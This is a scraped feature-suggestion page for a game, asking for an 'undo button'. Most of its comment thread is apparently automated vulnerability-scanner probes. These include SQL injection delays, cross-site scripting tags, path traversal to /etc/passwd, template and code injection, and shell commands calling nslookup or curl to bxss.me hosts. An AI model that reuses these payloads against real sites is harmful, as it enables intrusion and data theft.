Feedback

Submit suggestion

Undo button by wombat - 152 months ago

Undo button so that you can remove mistakes

573 agree

Unvote
  • 88TF

    do you mean when you make the ships?
  • Erik

    This is a good idea! Noted.
  • ALEJOCrack178YT

    GOOD IDEA!
  • ALEJOCrack178YT

    GOOD IDEA!
  • lxbfYeaa

    1
  • lxbfYeaa

    1
  • JJJ3QQQ

    JJJ30QQQ
  • WfxYANoW

    1
  • WfxYANoW

    1BBBG0IiIIO
  • WfxYANoW

    1<esi:include src="http://bxss.me/rpb.png"/>
  • WfxYANoW

    ../../../../../../../../../../../../../../etc/passwd
  • 1bzMyHcpSO

    1
  • WfxYANoW

    http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
  • WfxYANoW

    1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
  • WfxYANoW

    ../../../../../../../../../../../../../../windows/win.ini
  • WfxYANoW

    Http://bxss.me/t/fit.txt
  • WfxYANoW

    file:///etc/passwd
  • WfxYANoW

    http://bxss.me/t/fit.txt?.jpg
  • Anonymous

    1
  • WfxYANoW

    ${10000199+9999030}
  • ${9999294+9999102}

    1
  • WfxYANoW

    /etc/shells
  • WfxYANoW

    1
  • WfxYANoW

    response.write(9320740*9136756)
  • WfxYANoW

    eJzFJ6EB
  • WfxYANoW

    ../1
  • WfxYANoW

    ../../../../../../../../../../../../../../etc/shells
  • WfxYANoW

    echo yhbynb$()\ uoycwj\nz^xyu||a #' &echo yhbynb$()\ uoycwj\nz^xyu||a #|" &echo yhbynb$()\ uoycwj\nz^xyu||a #
  • WfxYANoW

    c:/windows/win.ini
  • WfxYANoW

    '+response.write(9320740*9136756)+'
  • WfxYANoW

    "+response.write(9320740*9136756)+"
  • WfxYANoW

    bxss.me
  • WfxYANoW

    &echo kipiji$()\ juadvh\nz^xyu||a #' &echo kipiji$()\ juadvh\nz^xyu||a #|" &echo kipiji$()\ juadvh\nz^xyu||a #
  • WfxYANoW

    RzGO4klT: ZLNIOSik
  • response.write(9914219*9282101)

    1
  • ptG4PR5P

    1
  • rWLszvaT: mB1AQp3d

    1
  • WfxYANoW

    1&echo kjgnxd$()\ qhfypw\nz^xyu||a #' &echo kjgnxd$()\ qhfypw\nz^xyu||a #|" &echo kjgnxd$()\ qhfypw\nz^xyu||a #
  • '+response.write(9914219*9282101)+'

    1
  • WfxYANoW

    1&n900088=v906107
  • file:///etc/passwd

    1
  • WfxYANoW

    |echo tckexr$()\ gwwryt\nz^xyu||a #' |echo tckexr$()\ gwwryt\nz^xyu||a #|" |echo tckexr$()\ gwwryt\nz^xyu||a #
  • 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

    1
  • WfxYANoW

    1
  • WfxYANoW

    1|echo wawhcy$()\ rrzdxj\nz^xyu||a #' |echo wawhcy$()\ rrzdxj\nz^xyu||a #|" |echo wawhcy$()\ rrzdxj\nz^xyu||a #
  • WfxYANoW&n981864=v986388

    1
  • "+response.write(9914219*9282101)+"

    1
  • WfxYANoW

    (nslookup -q=cname hitfhpigfxyau0e733.bxss.me||curl hitfhpigfxyau0e733.bxss.me))
  • ../WfxYANoW

    1
  • WfxYANoW

    $(nslookup -q=cname hitbbodqsfpva38cf4.bxss.me||curl hitbbodqsfpva38cf4.bxss.me)
  • WfxYANoW

    )
  • WfxYANoW

    &nslookup -q=cname hityjbbrsahbm9bb4e.bxss.me&'\"`0&nslookup -q=cname hityjbbrsahbm9bb4e.bxss.me&`'
  • ZndOY2pQeFE=

    1
  • WfxYANoW

    &(nslookup -q=cname hitgkhxxcxdead73c9.bxss.me||curl hitgkhxxcxdead73c9.bxss.me)&'\"`0&(nslookup -q=cname hitgkhxxcxdead73c9.bxss.me||curl hitgkhxxcxdead73c9.bxss.me)&`'
  • WfxYANoW

    !(()&&!|*|*|
  • WfxYANoW

    |(nslookup -q=cname hitvjkfuypsaq5cefc.bxss.me||curl hitvjkfuypsaq5cefc.bxss.me)
  • Http://bxss.me/t/fit.txt

    1
  • WfxYANoW

    '.gethostbyname(lc('hithk'.'jpmrfjisab6c4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(77).chr(101).chr(68).'
  • WfxYANoW

    ^(#$!@#$)(()))******
  • http://bxss.me/t/fit.txt?.jpg

    1
  • WfxYANoW

    `(nslookup -q=cname hitapfajcnrty4a152.bxss.me||curl hitapfajcnrty4a152.bxss.me)`
  • WfxYANoW

    ".gethostbyname(lc("hitmw"."jfhaxtnd57527.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(82).chr(113).chr(69)."
  • WfxYANoW

    1
  • WfxYANoW

    ;(nslookup -q=cname hitzrjfjuumpw31b9d.bxss.me||curl hitzrjfjuumpw31b9d.bxss.me)|(nslookup -q=cname hitzrjfjuumpw31b9d.bxss.me||curl hitzrjfjuumpw31b9d.bxss.me)&(nslookup -q=cname hitzrjfjuumpw31b9d.bxss.me||curl hitzrjfjuumpw31b9d.bxss.me)
  • WfxYANoW

    gethostbyname(lc('hitgt'.'edowdefw174da.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(86).chr(109).chr(78)
  • WfxYANoW

    1
  • /etc/shells

    1
  • WfxYANoW

    |(nslookup${IFS}-q${IFS}cname${IFS}hitdjezenrjnud49c2.bxss.me||curl${IFS}hitdjezenrjnud49c2.bxss.me)
  • )

    1
  • WfxYANoW

    ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  • WfxYANoW

    &(nslookup${IFS}-q${IFS}cname${IFS}hitzqthsmswdgb2f0b.bxss.me||curl${IFS}hitzqthsmswdgb2f0b.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitzqthsmswdgb2f0b.bxss.me||curl${IFS}hitzqthsmswdgb2f0b.bxss.me)&`'
  • !(()&&!|*|*|

    1
  • WfxYANoW

    '"()
  • WfxYANoW

    1'&&sleep(27*1000)*uutwob&&'
  • WfxYANoW

    ';print(md5(31337));$a='
  • WfxYANoW

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • WfxYANoW

    ";print(md5(31337));$a="
  • ^(#$!@#$)(()))******

    1
  • c:/windows/win.ini

    1
  • WfxYANoW

    ${@print(md5(31337))}
  • bxss.me

    1
  • WfxYANoW

    '"
  • WfxYANoW

    1"&&sleep(27*1000)*iqvpwy&&"
  • WfxYANoW

    <!--
  • WfxYANoW

    1'"()&%<zzz><ScRiPt >KJKG(9804)</ScRiPt>
  • WfxYANoW

    ${@print(md5(31337))}\
  • WfxYANoW

    1'||sleep(27*1000)*depcyu||'
  • WfxYANoW

    xfs.bxss.me
  • '"

    1
  • WfxYANoW

    '"()&%<zzz><ScRiPt >KJKG(9238)</ScRiPt>
  • WfxYANoW

    '.print(md5(31337)).'
  • xfs.bxss.me

    1
  • <!--

    1
  • WfxYANoW

    1"||sleep(27*1000)*dvykgt||"
  • WfxYANoW

    19455203
  • WfxYANoW

    "+"A".concat(70-3).concat(22*4).concat(102).concat(71).concat(101).concat(65)+(require"socket" Socket.gethostbyname("hituo"+"lxubyuajac90e.bxss.me.")[3].to_s)+"
  • WfxYANoW

    HttP://bxss.me/t/xss.html?%00
  • WfxYANoW

    '+'A'.concat(70-3).concat(22*4).concat(116).concat(74).concat(112).concat(90)+(require'socket' Socket.gethostbyname('hitqw'+'qqjwtnfe19c47.bxss.me.')[3].to_s)+'
  • WfxYANoW

    1
  • WfxYANoW

    'A'.concat(70-3).concat(22*4).concat(98).concat(89).concat(117).concat(73)+(require'socket' Socket.gethostbyname('hitcw'+'cpthpmqqa7bfb.bxss.me.')[3].to_s)
  • WfxYANoW

    bxss.me/t/xss.html?%00
  • WfxYANoW

    bfg7810<s1﹥s2ʺs3ʹhjl7810
  • WfxYANoW

    comment
  • '"()

    1
  • WfxYANoW

    comment
  • HttP://bxss.me/t/xss.html?%00

    1
  • ';print(md5(31337));$a='

    1
  • ";print(md5(31337));$a="

    1
  • ${@print(md5(31337))}

    1
  • bxss.me/t/xss.html?%00

    1
  • ${@print(md5(31337))}\

    1
  • '.print(md5(31337)).'

    1
  • WfxYANoW'&&sleep(27*1000)*echwto&&'

    1
  • WfxYANoW

    comment/.
  • WfxYANoW"&&sleep(27*1000)*nsjsoh&&"

    1
  • WfxYANoW

    <%={{={@{#{${dfb}}%>
  • WfxYANoW'||sleep(27*1000)*vtmqir||'

    1
  • WfxYANoW"||sleep(27*1000)*czoale||"

    1
  • WfxYANoW

    <th:t="${dfb}#foreach
  • comment

    1
  • comment

    1
  • comment/.

    1
  • WfxYANoW

    1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  • WfxYANoW

    1
  • WfxYANoW

    dfb{{98991*97996}}xca
  • WfxYANoW

    dfb[[${98991*97996}]]xca
  • WfxYANoW

    dfb__${98991*97996}__::.x
  • WfxYANoW

    "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  • WfxYANoW

    1<ScRiPt >KJKG(9952)</ScRiPt>
  • WfxYANoW

    1<WOQBSH>9DGQY[!+!]</WOQBSH>
  • WfxYANoW

    1<script>KJKG(9597)</script>
  • WfxYANoW

    1<script>KJKG(9741)</script>9741
  • WfxYANoW

    1<ScR<ScRiPt>IpT>KJKG(9036)</sCr<ScRiPt>IpT>
  • WfxYANoW

    1pIc4PhJu
  • WfxYANoW

    1<ScRiPt >KJKG(9651)</ScRiPt>
  • WfxYANoW

    1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9839></ScRiPt>
  • WfxYANoW

    1<ScRiPt >KJKG(9446)</ScRiPt>
  • WfxYANoW

    1<isindex type=image src=1 onerror=KJKG(9514)>
  • WfxYANoW

    1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9661'>
  • WfxYANoW

    1<body onload=KJKG(9254)>
  • WfxYANoW

    1<img src=//xss.bxss.me/t/dot.gif onload=KJKG(9273)>
  • WfxYANoW

    1<img src=xyz OnErRor=KJKG(9411)>
  • WfxYANoW

    1<img/src=">" onerror=alert(9385)>
  • WfxYANoW

    %31%3C%53%63%52%69%50%74%20%3E%4B%4A%4B%47%289412%29%3C%2F%73%43%72%69%70%54%3E
  • WfxYANoW

    1\u003CScRiPt\KJKG(9472)\u003C/sCripT\u003E
  • WfxYANoW

    1
  • WfxYANoW

    -1 OR 2+581-581-1=0+0+0+1 --
  • WfxYANoW

    -1 OR 2+634-634-1=0+0+0+1
  • WfxYANoW

    -1' OR 2+753-753-1=0+0+0+1 --
  • WfxYANoW

    1&lt;ScRiPt&gt;KJKG(9380)&lt;/sCripT&gt;
  • WfxYANoW

    -1' OR 2+224-224-1=0+0+0+1 or '4RCnZCFV'='
  • WfxYANoW

    -1" OR 2+981-981-1=0+0+0+1 --
  • WfxYANoW

    1<input autofocus onfocus=KJKG(9608)>
  • WfxYANoW

    <a HrEF=http://xss.bxss.me></a>
  • WfxYANoW

    <a HrEF=jaVaScRiPT:>
  • WfxYANoW

    1}body{zzz:Expre/**/SSion(KJKG(9124))}
  • WfxYANoW

    17wTYl <ScRiPt >KJKG(9670)</ScRiPt>
  • WfxYANoW

    1<WQP5HX>4DWJU[!+!]</WQP5HX>
  • WfxYANoW

    1<ifRAme sRc=9853.com></IfRamE>
  • WfxYANoW

    1<azMScQG x=9902>
  • WfxYANoW

    1*if(now()=sysdate(),sleep(15),0)
  • WfxYANoW

    1<img sRc='http://attacker-9138/log.php?
  • WfxYANoW

    1<aGIO7qG<
  • WfxYANoW'"()&%<zzz><ScRiPt >KJKG(9106)</ScRiPt>

    1
  • '"()&%<zzz><ScRiPt >KJKG(9095)</ScRiPt>

    1
  • WfxYANoW9251180

    1
  • bfg1074<s1﹥s2ʺs3ʹhjl1074

    1
  • <%={{={@{#{${dfb}}%>

    1
  • <th:t="${dfb}#foreach

    1
  • 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

    1
  • dfb{{98991*97996}}xca

    1
  • dfb[[${98991*97996}]]xca

    1
  • dfb__${98991*97996}__::.x

    1
  • "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

    1
  • WfxYANoW<ScRiPt >KJKG(9166)</ScRiPt>

    1
  • WfxYANoW

    10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
  • WfxYANoW<WUSONN>SMZEO[!+!]</WUSONN>

    1
  • WfxYANoW<script>KJKG(9180)</script>

    1
  • WfxYANoW<script>KJKG(9414)</script>9414

    1
  • WfxYANoW<ScRiPt >KJKG(9925)</ScRiPt>

    1
  • WfxYANoW<ScRiPt >KJKG(9967)</ScRiPt>

    1
  • WfxYANoW<body onload=KJKG(9198)>

    1
  • WfxYANoW<img src=xyz OnErRor=KJKG(9540)>

    1
  • WfxYANoW<img/src=">" onerror=alert(9525)>

    1
  • WfxYANoW

    10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
  • WfxYANoW\u003CScRiPt\KJKG(9148)\u003C/sCripT\u003E

    1
  • WfxYANoW&lt;ScRiPt&gt;KJKG(9776)&lt;/sCripT&gt;

    1
  • WfxYANoW<input autofocus onfocus=KJKG(9516)>

    1
  • <a HrEF=http://xss.bxss.me></a>

    1
  • <a HrEF=jaVaScRiPT:>

    1
  • WfxYANoW}body{zzz:Expre/**/SSion(KJKG(9273))}

    1
  • WfxYANoWoG3bb <ScRiPt >KJKG(9855)</ScRiPt>

    1
  • WfxYANoW<WIPOGT>GGGSI[!+!]</WIPOGT>

    1
  • WfxYANoW<ifRAme sRc=9395.com></IfRamE>

    1
  • WfxYANoW<aTjnThB x=9960>

    1
  • WfxYANoW

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • WfxYANoW<img sRc='http://attacker-9172/log.php?

    1
  • WfxYANoW<aBWsZPF<

    1
  • WfxYANoW

    1-1; waitfor delay '0:0:15' --
  • WfxYANoW

    1-1); waitfor delay '0:0:15' --
  • WfxYANoW

    1-1 waitfor delay '0:0:15' --
  • WfxYANoW

    1T4oEZrOQ'; waitfor delay '0:0:15' --
  • WfxYANoW

    1-1 OR 627=(SELECT 627 FROM PG_SLEEP(15))--
  • WfxYANoW

    1-1) OR 921=(SELECT 921 FROM PG_SLEEP(15))--
  • WfxYANoW

    1-1)) OR 213=(SELECT 213 FROM PG_SLEEP(15))--
  • WfxYANoW

    1AnpsER8K' OR 366=(SELECT 366 FROM PG_SLEEP(15))--
  • WfxYANoW

    1i3Mx6iXy') OR 415=(SELECT 415 FROM PG_SLEEP(15))--
  • WfxYANoW

    1YYixIk5C')) OR 448=(SELECT 448 FROM PG_SLEEP(15))--
  • WfxYANoW

    1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • WfxYANoW

    1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • WfxYANoW

    1'"
  • WfxYANoW

    @@8866g
  • WfxYANoW

    1
  • WfxYANoW

    1
  • WfxYANoWp1ZrHKrf

    1
  • WfxYANoW

    1
  • -1 OR 2+761-761-1=0+0+0+1 --

    1
  • -1 OR 2+963-963-1=0+0+0+1

    1
  • -1' OR 2+564-564-1=0+0+0+1 --

    1
  • -1' OR 2+340-340-1=0+0+0+1 or 'ibEl3WK4'='

    1
  • -1" OR 2+567-567-1=0+0+0+1 --

    1
  • if(now()=sysdate(),sleep(15),0)

    1
  • WfxYANoW-1 waitfor delay '0:0:15' --

    1
  • WfxYANoWZBLPowUN'; waitfor delay '0:0:15' --

    1
  • WfxYANoW'"

    1
  • @@V6uLn

    1
  • Peter Winter

    555-555-0199@example.com
  • Pecedec150

    555-555-0199@example.com
  • wrxbyoas

    1
  • pldykkcv

    response.write(9097969*9888120)
  • pldykkcv

    '+response.write(9097969*9888120)+'
  • yghkdadu

    1
  • pldykkcv

    "+response.write(9097969*9888120)+"
  • yghkdadu

    1
  • lvxfnfwu

    set|set&set
  • response.write(9211725*9308293)

    1
  • yghkdadu

    BCflPYLr
  • lvxfnfwu

    $(nslookup 96X9MOBM)
  • '+response.write(9211725*9308293)+'

    1
  • yghkdadu

    -1 OR 2+690-690-1=0+0+0+1 --
  • lvxfnfwu

    &nslookup uJbo4WPp&'\"`0&nslookup uJbo4WPp&`'
  • "+response.write(9211725*9308293)+"

    1
  • qvdtoqcb

    zkEBovzn
  • yghkdadu

    -1 OR 2+424-424-1=0+0+0+1
  • set|set&set

    1
  • sdghsbca

    ../../../../../../../../../../etc/passwd
  • k8yJWxOi

    1
  • yghkdadu

    -1' OR 2+619-619-1=0+0+0+1 --
  • $(nslookup s0aNWGOL)

    1
  • sdghsbca

    ../../../../../../../../../../../../../../../proc/version
  • ecvxmrkv

    1
  • yghkdadu

    -1' OR 2+45-45-1=0+0+0+1 or 'xjtgEoly'='
  • &nslookup qxfwI3BE&'\"`0&nslookup qxfwI3BE&`'

    1
  • pmrnrutj

    ${9999987+10000271}
  • sdghsbca

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  • yghkdadu

    -1" OR 2+514-514-1=0+0+0+1 --
  • kmxeligk

    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  • ${9999253+9999830}

    1
  • sdghsbca

    ../../../../../../../../../../etc/passwd.jpg
  • ODE3SzcxUFI=

    1
  • yghkdadu

    if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
  • kmxeligk

    1some_inexistent_file_with_long_name.jpg
  • lravsuwl

    1&n907872=v975483
  • sdghsbca

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  • hfsrlklb

    )
  • yghkdadu

    (select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
  • kmxeligk

    Http://testasp.vulnweb.com/t/fit.txt
  • sdghsbca

    /../..//../..//../..//../..//../..//etc/passwd.jpg
  • hfsrlklb

    !(()&&!|*|*|
  • ecvxmrkv

    1
  • yghkdadu

    -1; waitfor delay '0:0:10' --
  • kmxeligk

    http://testasp.vulnweb.com/t/fit.txt?.jpg
  • vsbbmyng&n963911=v925772

    1
  • sdghsbca

    .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
  • hfsrlklb

    ^(#$!@#$)(()))******
  • Anonymous

    1
  • yghkdadu

    -1); waitfor delay '0:0:3' --
  • kmxeligk

    testasp.vulnweb.com
  • sdghsbca

    /etc/passwd
  • )

    1
  • yghkdadu

    -1); waitfor delay '0:0:0' --
  • sdghsbca

    %2fetc%2fpasswd
  • !(()&&!|*|*|

    1
  • yghkdadu

    1 waitfor delay '0:0:3' --
  • 1some_inexistent_file_with_long_name.jpg

    1
  • eukexnil

    '"()
  • iytylvey

    ;print(md5(acunetix_wvs_security_test));
  • sdghsbca

    /.././.././.././.././.././.././.././../etc/./passwd%00
  • ^(#$!@#$)(()))******

    1
  • fufpnojw

    http://testasp.vulnweb.com/t/xss.html?%00.jpg
  • yghkdadu

    1 waitfor delay '0:0:7' --
  • Http://testasp.vulnweb.com/t/fit.txt

    1
  • iytylvey

    ';print(md5(acunetix_wvs_security_test));$a='
  • sdghsbca

    ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
  • piyocera

    1
  • http://testasp.vulnweb.com/t/xss.html?%00.jpg

    1
  • yghkdadu

    uBDusAwh'; waitfor delay '0:0:3' --
  • http://testasp.vulnweb.com/t/fit.txt?.jpg

    1
  • '"()

    1
  • iytylvey

    ";print(md5(acunetix_wvs_security_test));$a="
  • sdghsbca

    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
  • piyocera

    comment
  • lmqvbbqj

    http://hitlXfu5Pr5ur.bxss.me/
  • yghkdadu

    MILhqSu8'; waitfor delay '0:0:7' --
  • testasp.vulnweb.com

    1
  • uulgkyeh

    1
  • iytylvey

    ${@print(md5(acunetix_wvs_security_test))}
  • piyocera

    comment
  • http://hitbwpue4bB8V.bxss.me/

    1
  • yghkdadu

    -1;select pg_sleep(3); --
  • wcurokpf

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • uulgkyeh

    1'"
  • iytylvey

    ${@print(md5(acunetix_wvs_security_test))}\
  • sdghsbca

    invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
  • piyocera

    comment/.
  • udxkmfoj

    /www.vulnweb.com
  • yghkdadu

    -1;select pg_sleep(10); --
  • uulgkyeh

    \
  • ;print(md5(acunetix_wvs_security_test));

    1
  • sdghsbca

    file:///etc/passwd
  • piyocera

    1
  • /www.vulnweb.com

    1
  • yghkdadu

    -1);select pg_sleep(3); --
  • pnefddtg

    '"
  • ';print(md5(acunetix_wvs_security_test));$a='

    1
  • sdghsbca

    /\../\../\../\../\../\../\../etc/passwd
  • comment

    1
  • bgcwuevb

    1'"()&%<acx><ScRiPt >FzTr(9095)</ScRiPt>
  • yghkdadu

    -1);select pg_sleep(10); --
  • pnefddtg

    <!--
  • uulgkyeh

    @@fEe5R
  • ";print(md5(acunetix_wvs_security_test));$a="

    1
  • sdghsbca

    WEB-INF/web.xml
  • comment

    1
  • yghkdadu

    -1));select pg_sleep(7); --
  • '"

    1
  • uulgkyeh

    JyI=
  • ${@print(md5(acunetix_wvs_security_test))}

    1
  • sdghsbca

    /WEB-INF/web.xml
  • comment/.

    1
  • yghkdadu

    tXgZZz00';select pg_sleep(7); --
  • <!--

    1
  • bgcwuevb

    '"()&%<acx><ScRiPt >FzTr(9553)</ScRiPt>
  • ${@print(md5(acunetix_wvs_security_test))}\

    1
  • sdghsbca

    WEB-INF\web.xml
  • yghkdadu

    8fGPQuYq');select pg_sleep(7); --
  • ../../../../../../../../../../etc/passwd

    1
  • yghkdadu

    MLJUEF9m'));select pg_sleep(7); --
  • uulgkyeh

    (select convert(int,CHAR(65)))
  • bgcwuevb

    1_9808
  • yghkdadu

    1
  • uulgkyeh

    1
  • yghkdadu

    1
  • 1'"

    1
  • bgcwuevb

    acu2042<s1﹥s2ʺs3ʹuca2042
  • ../../../../../../../../../../etc/passwd.jpg

    1
  • WVkZD9xF

    1
  • \

    1
  • -1 OR 2+378-378-1=0+0+0+1 --

    1
  • -1 OR 2+60-60-1=0+0+0+1

    1
  • @@lYnQq

    1
  • -1' OR 2+704-704-1=0+0+0+1 --

    1
  • .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

    1
  • JyI=

    1
  • bgcwuevb

    {{9999145*9999143}}
  • -1' OR 2+408-408-1=0+0+0+1 or '4c3fYVXK'='

    1
  • /etc/passwd

    1
  • -1" OR 2+806-806-1=0+0+0+1 --

    1
  • %2fetc%2fpasswd

    1
  • bgcwuevb

    1<ScRiPt >FzTr(9554)</ScRiPt>
  • (select convert(int,CHAR(65)))

    1
  • 1 waitfor delay '0:0:9' --

    1
  • bgcwuevb

    1<WUIVWW>U8G9J[!+!]</WUIVWW>
  • 3JAw7xkz'; waitfor delay '0:0:9' --

    1
  • NCnUsQVJ';select pg_sleep(13); --

    1
  • bgcwuevb

    1<script>FzTr(9715)</script>
  • yKmJXjoP');select pg_sleep(13); --

    1
  • GsP11Wlx'));select pg_sleep(13); --

    1
  • file:///etc/passwd

    1
  • bgcwuevb

    1<ScR<ScRiPt>IpT>FzTr(9124)</sCr<ScRiPt>IpT>
  • /\../\../\../\../\../\../\../etc/passwd

    1
  • WEB-INF/web.xml

    1
  • bgcwuevb

    1<ScRiPt >FzTr(9167)</ScRiPt>
  • /WEB-INF/web.xml

    1
  • WEB-INF\web.xml

    1
  • bgcwuevb

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9623></ScRiPt>
  • bgcwuevb

    1<ScRiPt >FzTr(9131)</ScRiPt>
  • bgcwuevb

    1<video><source onerror="javascript:FzTr(9480)">
  • bgcwuevb

    1<isindex type=image src=1 onerror=FzTr(9887)>
  • bgcwuevb

    1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9750'>
  • bgcwuevb

    1<body onload=FzTr(9551)>
  • bgcwuevb

    1<img src=//testasp.vulnweb.com/t/dot.gif onload=FzTr(9340)>
  • bgcwuevb

    1<img src=xyz OnErRor=FzTr(9950)>
  • bgcwuevb

    1<img/src=">" onerror=alert(9658)>
  • bgcwuevb

    %31%3C%53%63%52%69%50%74%20%3E%46%7A%54%72%289964%29%3C%2F%73%43%72%69%70%54%3E
  • bgcwuevb

    1\u003CScRiPt\FzTr(9145)\u003C/sCripT\u003E
  • bgcwuevb

    1&lt;ScRiPt&gt;FzTr(9639)&lt;/sCripT&gt;
  • bgcwuevb

    1<input autofocus onfocus=FzTr(9279)>
  • bgcwuevb

    <a HrEF=http://www.vulnweb.com></a>
  • bgcwuevb

    <a HrEF=jaVaScRiPT:>
  • bgcwuevb

    [url=http://www.vulnweb.com][/url]
  • bgcwuevb

    1<img<!-- --> src=x onerror=alert(9290);//><!-- -->
  • bgcwuevb

    1}body{acu:Expre/**/SSion(FzTr(9857))}
  • bgcwuevb

    1<% contenteditable onresize=FzTr(9882)>
  • bgcwuevb

    1_2ekSv <ScRiPt >FzTr(9041)</ScRiPt>
  • bgcwuevb

    1<WBB2GH>3AN0P[!+!]</WBB2GH>
  • bgcwuevb

    1<ifRAme sRc=9848.com></IfRamE>
  • bgcwuevb

    1<07SUTH x=9690>
  • bgcwuevb

    1<img sRc='http://attacker-9826/log.php?
  • bgcwuevb'"()&%<acx><ScRiPt >FzTr(9389)</ScRiPt>

    1
  • '"()&%<acx><ScRiPt >FzTr(9647)</ScRiPt>

    1
  • bgcwuevb_9218

    1
  • acu8447<s1﹥s2ʺs3ʹuca8447

    1
  • {{9999344*10000257}}

    1
  • bgcwuevb<ScRiPt >FzTr(9424)</ScRiPt>

    1
  • bgcwuevb<WROH0N>5YBWN[!+!]</WROH0N>

    1
  • bgcwuevb<script>FzTr(9256)</script>

    1
  • bgcwuevb<ScRiPt >FzTr(9601)</ScRiPt>

    1
  • bgcwuevb<ScRiPt >FzTr(9952)</ScRiPt>

    1
  • bgcwuevb<body onload=FzTr(9992)>

    1
  • bgcwuevb<img src=xyz OnErRor=FzTr(9361)>

    1
  • bgcwuevb<img/src=">" onerror=alert(9274)>

    1
  • bgcwuevb\u003CScRiPt\FzTr(9707)\u003C/sCripT\u003E

    1
  • bgcwuevb&lt;ScRiPt&gt;FzTr(9149)&lt;/sCripT&gt;

    1
  • bgcwuevb<input autofocus onfocus=FzTr(9374)>

    1
  • <a HrEF=http://www.vulnweb.com></a>

    1
  • <a HrEF=jaVaScRiPT:>

    1
  • [url=http://www.vulnweb.com][/url]

    1
  • bgcwuevb}body{acu:Expre/**/SSion(FzTr(9738))}

    1
  • bgcwuevb<% contenteditable onresize=FzTr(9292)>

    1
  • bgcwuevb_cfui2 <ScRiPt >FzTr(9952)</ScRiPt>

    1
  • bgcwuevb<WL2RFJ>KWNH1[!+!]</WL2RFJ>

    1
  • bgcwuevb<ifRAme sRc=9665.com></IfRamE>

    1
  • bgcwuevb<0q3J9k x=9314>

    1
  • bgcwuevb<img sRc='http://attacker-9974/log.php?

    1

Comment

Top